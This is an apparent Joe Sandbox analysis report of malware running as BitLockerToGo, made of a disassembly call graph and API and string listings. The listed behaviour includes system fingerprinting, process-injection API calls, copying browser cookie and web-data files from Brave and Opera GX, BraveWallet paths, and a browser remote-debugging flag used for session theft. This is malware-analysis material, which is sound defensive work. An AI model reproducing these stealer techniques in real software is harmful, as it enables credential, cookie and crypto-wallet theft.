CoSetProxyBlanket 70403->70404 70405 2a136ef 70403->70405 70407 2a1368d 70404->70407 70406 2a12143 lstrcpy 70405->70406 70408 2a1371a 70406->70408 70407->70405 70409 2a136b5 VariantInit 70407->70409 70408->69818 70410 2a136d4 70409->70410 70542 2a1399e LocalAlloc CharToOemW 70410->70542 70412 2a136dc 70413 2a12143 lstrcpy 70412->70413 70414 2a136e3 VariantClear 70413->70414 70414->70408 70415->69846 70417 2a12143 lstrcpy 70416->70417 70418 2a13229 70417->70418 70418->69861 70420 2a12143 lstrcpy 70419->70420 70421 2a12a5e GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 70420->70421 70422 2a12b49 70421->70422 70430 2a12a98 70421->70430 70423 2a12b61 70422->70423 70424 2a12b55 LocalFree 70422->70424 70426 2a1e88c DName::DName 5 API calls 70423->70426 70424->70423 70425 2a12a9e GetLocaleInfoA 70425->70430 70427 2a12b71 70426->70427 70427->69875 70428 2a12265 lstrlen lstrcpy lstrcat 70428->70430 70429 2a121e9 lstrcpy 70429->70430 70430->70422 70430->70425 70430->70428 70430->70429 70432 2a129e2 70431->70432 70433 2a129c6 wsprintfA 70431->70433 70434 2a1e88c DName::DName 5 API calls 70432->70434 70433->70432 70435 2a129ef 70434->70435 70435->69903 70437 2a12bf0 RegQueryValueExA 70436->70437 70438 2a12c08 RegCloseKey 70436->70438 70437->70438 70438->69920 70440 2a12cd8 GetLogicalProcessorInformationEx 70439->70440 70441 2a12ca4 GetLastError 70440->70441 70445 2a12ce3 70440->70445 70443 2a12d4f 70441->70443 70452 2a12cb3 70441->70452 70444 2a12d48 70443->70444 70546 2a137b7 GetProcessHeap HeapFree 70443->70546 70451 2a1e88c DName::DName 5 API calls 70444->70451 70545 2a137b7 GetProcessHeap HeapFree 70445->70545 70446 2a12d1c 70446->70444 70450 2a12d25 wsprintfA 70446->70450 70450->70444 70453 2a12d73 70451->70453 70452->70440 70452->70444 70543 2a137b7 GetProcessHeap HeapFree 70452->70543 70544 2a137d4 GetProcessHeap RtlAllocateHeap 70452->70544 70453->69935 70455 2a1e88c DName::DName 5 API calls 70454->70455 70456 2a12c61 70455->70456 70456->69949 70547 2a13782 70457->70547 70460 2a12dbb wsprintfA 70462 2a1e88c DName::DName 5 API calls 70460->70462 70463 2a12dec 70462->70463 70463->69963 70465 2a12143 lstrcpy 70464->70465 70471 2a12e0f 70465->70471 70466 2a12e3b EnumDisplayDevicesA 70467 2a12e4f 70466->70467 70466->70471 70468 2a1e88c DName::DName 5 API calls 70467->70468 70470 2a12e5d 70468->70470 70469 2a121a5 2 API calls 70469->70471 70470->69977 70471->70466 70471->70467 70471->70469 70473 2a12143 lstrcpy 70472->70473 70474 2a13122 CreateToolhelp32Snapshot Process32First 70473->70474 70475 2a131a8 CloseHandle 70474->70475 70479 2a1314a 70474->70479 70476 2a1e88c DName::DName 5 API calls 70475->70476 70478 2a131bd 70476->70478 70477 2a13196 Process32Next 70477->70475 70477->70479 70478->69991 70479->70477 70480 2a12265 lstrlen lstrcpy lstrcat 70479->70480 70481 2a121e9 lstrcpy 70479->70481 70480->70479 70481->70479 70483 2a12143 lstrcpy 70482->70483 70484 2a12e97 RegOpenKeyExA 70483->70484 70485 2a130d4 70484->70485 70498 2a12edd 70484->70498 70486 2a12175 lstrcpy 70485->70486 70489 2a130e5 70486->70489 70487 2a12ee3 RegEnumKeyExA 70488 2a12f20 wsprintfA RegOpenKeyExA 70487->70488 70487->70498 70490 2a12f66 RegQueryValueExA 70488->70490 70491 2a130bc RegCloseKey 70488->70491 70496 2a1e88c DName::DName 5 API calls 70489->70496 70494 2a1309c RegCloseKey 70490->70494 70495 2a12f9c lstrlen 70490->70495 70493 2a130c8 RegCloseKey 70491->70493 70492 2a130ba 70492->70493 70493->70485 70494->70498 70495->70494 70495->70498 70497 2a130ff 70496->70497 70497->70005 70498->70487 70498->70492 70498->70494 70499 2a1300c RegQueryValueExA 70498->70499 70500 2a12265 lstrlen lstrcpy lstrcat 70498->70500 70501 2a121e9 lstrcpy 70498->70501 70499->70494 70499->70498 70500->70498 70501->70498 70503 2a18bf6 70502->70503 70504 2a121e9 lstrcpy 70503->70504 70505 2a18c13 70504->70505 70506 2a121e9 lstrcpy 70505->70506 70507 2a18c2f 70506->70507 70508 2a121e9 lstrcpy 70507->70508 70509 2a18c3a 70508->70509 70510 2a121e9 lstrcpy 70509->70510 70511 2a18c45 70510->70511 70512 2a18c4c Sleep 70511->70512 70513 2a18c5c 70511->70513 70512->70511 70514 2a18c78 CreateThread WaitForSingleObject 70513->70514 70549 2a1e4ae 51 API calls 70513->70549 70516 2a12143 lstrcpy 70514->70516 70550 2a18b15 70514->70550 70518 2a18ca0 70516->70518 70517 2a18c76 70517->70514 70518->70024 70520 2a13268 RegOpenKeyExA 70519->70520 70520->70365 70520->70366 70524 2a12805 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 70521->70524 70523 2a127b4 70523->70379 70523->70380 70525 2a12848 RegQueryValueExA 70524->70525 70526 2a1285f RegCloseKey 70524->70526 70525->70526 70527 2a1286f 70526->70527 70527->70523 70528->70385 70540 2a3091d 70529->70540 70531 2a133bf CoCreateInstance 70532 2a133e7 SysAllocString 70531->70532 70533 2a13443 70531->70533 70532->70533 70535 2a133f6 70532->70535 70533->70397 70534 2a1343c SysFreeString 70534->70533 70535->70534 70536 2a1341a _wtoi64 SysFreeString 70535->70536 70536->70534 70538 2a1e88c DName::DName 5 API calls 70537->70538 70539 2a135f2 70538->70539 70539->69805 70540->70531 70541->70402 70542->70412 70543->70452 70544->70452 70545->70446 70546->70444 70548 2a12da9 GlobalMemoryStatusEx 70547->70548 70548->70460 70549->70517 70559 2a3091d 70550->70559 70552 2a18b21 lstrlen 70554 2a18b32 70552->70554 70557 2a18b3d 70552->70557 70553 2a12175 lstrcpy 70553->70557 70556 2a121e9 lstrcpy 70556->70557 70557->70553 70557->70556 70558 2a18ba3 StrCmpCA 70557->70558 70560 2a053aa 70557->70560 70558->70554 70558->70557 70559->70552 70561 2a12143 lstrcpy 70560->70561 70562 2a053e4 70561->70562 70563 2a12175 lstrcpy 70562->70563 70564 2a053f1 70563->70564 70565 2a049de 5 API calls 70564->70565 70566 2a053fd 70565->70566 70750 2a13ab9 70566->70750 70569 2a13ab9 4 API calls 70570 2a0545b 70569->70570 70571 2a12143 lstrcpy 70570->70571 70572 2a0546e 70571->70572 70573 2a12143 lstrcpy 70572->70573 70574 2a0547e 70573->70574 70575 2a12143 lstrcpy 70574->70575 70576 2a0548e 70575->70576 70577 2a12143 lstrcpy 70576->70577 70578 2a0549e StrCmpCA 70577->70578 70579 2a054bd 70578->70579 70580 2a054e6 70579->70580 70581 2a054cb InternetOpenA 70579->70581 70582 2a138a6 7 API calls 70580->70582 70581->70580 70587 2a05d8c 70581->70587 70583 2a054f4 70582->70583 70584 2a12223 2 API calls 70583->70584 70585 2a05507 70584->70585 70586 2a121e9 lstrcpy 70585->70586 70588 2a05512 70586->70588 70589 2a12175 lstrcpy 70587->70589 70590 2a12265 3 API calls 70588->70590 70741 2a05cb1 70589->70741 70591 2a05543 70590->70591 70592 2a12223 2 API calls 70591->70592 70593 2a05554 70592->70593 70594 2a12265 3 API calls 70593->70594 70595 2a0555f 70594->70595 70596 2a121e9 lstrcpy 70595->70596 70597 2a0556a 70596->70597 70603 2a1e88c DName::DName 5 API calls 70604 2a05e55 70603->70604 70604->70557 70741->70603 70751 2a13aca CryptBinaryToStringA 70750->70751 70753 2a0543a lstrlen 70750->70753 70752 2a13ae3 GetProcessHeap RtlAllocateHeap 70751->70752 70751->70753 70752->70753 70754 2a13b00 CryptBinaryToStringA 70752->70754 70753->70569 70754->70753 71106 2a08fef malloc 70755->71106 70757 2a0903d 70757->70066 70759 2a12143 lstrcpy 70758->70759 70760 2a0d6d9 70759->70760 71157 2a13a18 SHGetFolderPathA 70760->71157 70763 2a12223 2 API calls 70817 2a12143 lstrcpy 70816->70817 70818 2a0d8fb 70817->70818 70819 2a12143 lstrcpy 70818->70819 70820 2a0d908 StrCmpCA 70819->70820 70821 2a0daf8 70820->70821 70822 2a0d92b 70820->70822 70823 2a13a18 7 API calls 70821->70823 70824 2a13a18 7 API calls 70822->70824 70825 2a0dafd 70823->70825 70826 2a0d930 70824->70826 70827 2a12223 2 API calls 70825->70827 70828 2a12223 2 API calls 70826->70828 70935 2a12143 lstrcpy 70934->70935 70936 2a0e9b3 70935->70936 70937 2a12143 lstrcpy 70936->70937 70938 2a0e9c0 70937->70938 70939 2a13a18 7 API calls 70938->70939 70940 2a0e9ca 70939->70940 70941 2a12223 2 API calls 70940->70941 70942 2a0e9d8 70941->70942 70993 2a0f1b8 _memset 70992->70993 70994 2a0f1fa RegOpenKeyExA 70993->70994 70995 2a0f233 RegGetValueA 70994->70995 70996 2a0f6b4 70994->70996 70997 2a0f260 70995->70997 70998 2a0f283 70995->70998 71000 2a1e88c DName::DName 5 API calls 70996->71000 70997->70996 70999 2a0f26c RegCloseKey 70997->70999 70998->70997 71001 2a0f293 RegCloseKey 70998->71001 71002 2a0f2a5 RegOpenKeyExA 70998->71002 70999->70996 71003 2a0f6c9 71000->71003 71001->71002 71002->70996 71109 2a07c43 71106->71109 71112 2a07b02 71109->71112 71111 2a07c5d 71111->70757 71113 2a07b14 71112->71113 71114 2a07b19 71112->71114 71113->71111 71129 2a0766f 71114->71129 71116 2a07b3a 71117 2a07c04 71116->71117 71133 2a07728 71116->71133 71117->71111 71119 2a07b48 71119->71117 71139 2a078f2 71119->71139 71130 2a07680 71129->71130 71132 2a07687 71130->71132 71154 2a137d4 GetProcessHeap RtlAllocateHeap 71130->71154 71132->71116 71134 2a07767 VirtualAlloc 71133->71134 71136 2a07741 71133->71136 71135 2a07793 71134->71135 71137 2a07799 71134->71137 71135->71137 71138 2a0779e VirtualAlloc 71135->71138 71136->71134 71137->71119 71138->71137 71140 2a07a28 71139->71140 71141 2a0790c 71139->71141 71140->71117 71148 2a07a3b 71140->71148 71141->71140 71142 2a07926 LoadLibraryA 71141->71142 71143 2a07a2e 71142->71143 71144 2a07940 71142->71144 71143->71140 71144->71141 71144->71143 71146 2a079f7 GetProcAddress 71144->71146 71146->71143 71146->71144 71149 2a07ad0 71148->71149 71150 2a07a51 71148->71150 71150->71149 71154->71132 71158 2a12143 lstrcpy 71157->71158 71159 2a13a6b 71158->71159 71160 2a1e88c DName::DName 5 API calls 71159->71160 71161 2a0d6eb 71160->71161 71161->70763 72858 2a19c6c 72859 2a19c73 72858->72859 72860 2a1e88c DName::DName 5 API calls 72859->72860 72861 2a19c88 72860->72861

                                                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                                                          Function 02A1A132 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                                                          • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2238633743-2740034357
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 306d5bb266e47852d2ea6910145821d77c9279220e454c58d5481ae9fbd506d5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7709b8895527d6cf7d1deabecd9f58a25e0a79420b01b3a1b66fe64b52761cda
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 306d5bb266e47852d2ea6910145821d77c9279220e454c58d5481ae9fbd506d5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B852F97DCC0241EFDB1A9F61EE4AB263AF2F7082153054B25FE9591224D77258B0EF62
                                                                                                                                                                                                                                                                                                                                                          Function 02A0A941 Relevance: 67.3, APIs: 29, Strings: 9, Instructions: 780filestringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 451 2a0a941-2a0aa01 call 2a12143 call 2a12223 call 2a12265 call 2a121e9 call 2a02910 * 2 call 2a12143 * 2 FindFirstFileA 468 2a0b6c1-2a0b720 call 2a02910 * 3 call 2a01cce call 2a02910 * 5 call 2a1e88c 451->468 469 2a0aa07-2a0aa1b StrCmpCA 451->469 470 2a0aa21-2a0aa35 StrCmpCA 469->470 471 2a0b69a-2a0b6af FindNextFileA 469->471 470->471 473 2a0aa3b-2a0aab1 call 2a121a5 call 2a12223 call 2a12265 * 2 call 2a121e9 call 2a02910 * 3 470->473 471->469 474 2a0b6b5-2a0b6bb FindClose 471->474 508 2a0aab7-2a0aacd StrCmpCA 473->508 509 2a0abba-2a0ac2e call 2a12265 * 4 call 2a121e9 call 2a02910 * 3 473->509 474->468 511 2a0ab44-2a0abb8 call 2a12265 * 4 call 2a121e9 call 2a02910 * 3 508->511 512 2a0aacf-2a0ab3f call 2a12265 * 4 call 2a121e9 call 2a02910 * 3 508->512 562 2a0ac34-2a0ac49 call 2a02910 StrCmpCA 509->562 511->562 512->562 565 2a0ae1b-2a0ae30 StrCmpCA 562->565 566 2a0ac4f-2a0ac63 StrCmpCA 562->566 567 2a0ae32-2a0ae75 call 2a01ced call 2a12175 * 3 call 2a09777 565->567 568 2a0ae85-2a0ae9a StrCmpCA 565->568 566->565 569 2a0ac69-2a0ad9f call 2a12143 call 2a138a6 call 2a12265 call 2a12223 call 2a12265 call 2a12223 call 2a121e9 call 2a02910 * 5 CopyFileA call 2a12143 call 2a12265 * 2 call 2a121e9 call 2a02910 * 2 call 2a12175 call 2a09148 566->569 642 2a0ae7a-2a0ae80 567->642 572 2a0aea0-2a0aeb1 StrCmpCA 568->572 573 2a0b0ae-2a0b0c8 call 2a12175 call 2a139ee 568->573 825 2a0ada1-2a0addf call 2a01ced call 2a12175 call 2a18be6 call 2a02910 569->825 826 2a0ade4-2a0ae16 DeleteFileA call 2a02910 * 3 569->826 577 2a0aeb7-2a0aebf 572->577 578 2a0b5ef-2a0b5f6 572->578 603 2a0b2c6-2a0b2db StrCmpCA 573->603 604 2a0b0ce-2a0b0d6 573->604 577->578 579 2a0aec5-2a0aec8 577->579 582 2a0b5f8-2a0b65f call 2a01ced call 2a12175 * 4 call 2a12143 call 2a0a941 578->582 583 2a0b66a-2a0b694 call 2a02910 * 2 578->583 585 2a0b032-2a0b0a9 call 2a25490 lstrcat * 3 call 2a01ced 579->585 586 2a0aece-2a0aed4 579->586 685 2a0b664 582->685 583->471 628 2a0b2b3-2a0b2b9 call 2a08dea 585->628 586->471 592 2a0aeda-2a0af7e call 2a12143 call 2a138a6 call 2a12265 call 2a12223 call 2a12265 call 2a12223 call 2a121e9 call 2a02910 * 5 586->592 750 2a0af93-2a0afae CopyFileA 592->750 611 2a0b2e1-2a0b3bb call 2a12143 call 2a138a6 call 2a12265 call 2a12223 call 2a12265 call 2a12223 call 2a121e9 call 2a02910 * 5 CopyFileA call 2a12175 call 2a09148 603->611 612 2a0b462-2a0b477 StrCmpCA 603->612 604->578 614 2a0b0dc-2a0b0df 604->614 787 2a0b438-2a0b44a DeleteFileA call 2a02910 611->787 788 2a0b3bd-2a0b40f call 2a01ced call 2a12265 call 2a12223 call 2a12265 call 2a18be6 611->788 612->578 621 2a0b47d-2a0b53c call 2a12143 call 2a138a6 call 2a12265 call 2a12223 call 2a12265 call 2a12223 call 2a121e9 call 2a02910 * 5 CopyFileA 612->621 623 2a0b244-2a0b2b2 call 2a25490 lstrcat * 3 call 2a01ced 614->623 624 2a0b0e5-2a0b0eb 614->624 766 2a0b542-2a0b5bd call 2a01ced call 2a12175 * 3 call 2a09c95 call 2a01ced call 2a12175 * 3 call 2a09eca 621->766 767 2a0b5c3-2a0b5d5 DeleteFileA call 2a02910 621->767 623->628 624->471 633 2a0b0f1-2a0b195 call 2a12143 call 2a138a6 call 2a12265 call 2a12223 call 2a12265 call 2a12223 call 2a121e9 call 2a02910 * 5 624->633 647 2a0b2be-2a0b2c1 628->647 776 2a0b1aa-2a0b1c5 CopyFileA 633->776 642->578 647->578 685->583 753 2a0af80-2a0af90 call 2a12175 call 2a140f6 750->753 754 2a0afb0-2a0afd1 call 2a12175 call 2a09148 750->754 753->750 790 2a0b022-2a0b02d call 2a02910 754->790 791 2a0afd3-2a0b018 call 2a01ced call 2a12265 call 2a18be6 call 2a02910 754->791 766->767 782 2a0b5da-2a0b5e1 767->782 784 2a0b197-2a0b1a7 call 2a12175 call 2a140f6 776->784 785 2a0b1c7-2a0b1e8 call 2a12175 call 2a09148 776->785 792 2a0b5e8-2a0b5ea call 2a02910 782->792 784->776 820 2a0b239 785->820 821 2a0b1ea-2a0b22f call 2a01ced call 2a12265 call 2a18be6 call 2a02910 785->821 808 2a0b44f-2a0b45d 787->808 857 2a0b414-2a0b433 call 2a02910 * 3 788->857 790->471 791->790 792->578 808->792 820->623 821->820 825->826 826->565 857->787
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,02A3786B,02A3786A,02A38464,02A37867,?,?,?), ref: 02A0A9EB
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A38468), ref: 02A0AA13
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A3846C), ref: 02A0AA2D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121A5: lstrlen.KERNEL32(?,?,02A19098,02A377FE,02A37787,?,?,?,?,02A19D6E), ref: 02A121AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121A5: lstrcpy.KERNEL32(00000000,00000000), ref: 02A121DD
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera GX,02A38470,?,02A3786E), ref: 02A0AABF
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Brave,02A38490,02A38494,02A38470,?,02A3786E), ref: 02A0AC41
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 02A0AC5B
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0AD1B
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A0ADEA
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A0AE28
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A0AE92
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(02A0DCCC), ref: 02A0AEA9
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0AFA1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A140F6: _memset.LIBCMT ref: 02A1411D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A140F6: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 02A141C3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A140F6: TerminateProcess.KERNEL32(00000000,00000000), ref: 02A141D1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A140F6: CloseHandle.KERNEL32(00000000), ref: 02A141D8
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A0B03F
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A0B051
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A0B061
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A0B251
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A0B263
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A0B273
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 02A0B285
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A0B2D3
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0B393
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A0B43E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A0B46F
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 02A0B073
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0B1B8
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0B52F
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A0B5C9
                                                                                                                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 02A0B6A7
                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 02A0B6BB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: File$lstrcat$lstrcpy$Copy$CloseDeleteFind_memset$CreateHandleProcesslstrlen$AllocFirstLocalNextObjectOpenReadSingleSizeSystemTerminateThreadTimeWait
                                                                                                                                                                                                                                                                                                                                                          • String ID: --remote-debugging-port=9223 --profile-directory="$ --remote-debugging-port=9223 --profile-directory="$Brave$Opera GX$Preferences$\BraveWallet\Preferences$_cookies.db$_cookies.db$_webdata.db
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1219303437-2271920603
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 53bdfe99a7b72cd49fe77c8711a19356f914b6ee90ff32296dc6ebbfc0acdbcd
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2abe8c6f78fefac2c3a822eb29f6359501b20f33160d3f4d550fc0507236cba4
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53bdfe99a7b72cd49fe77c8711a19356f914b6ee90ff32296dc6ebbfc0acdbcd
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D372EA72D802299BDF21EB64EE85BCDB77AAF04354F4005A1AE4873150DF71AF998F81
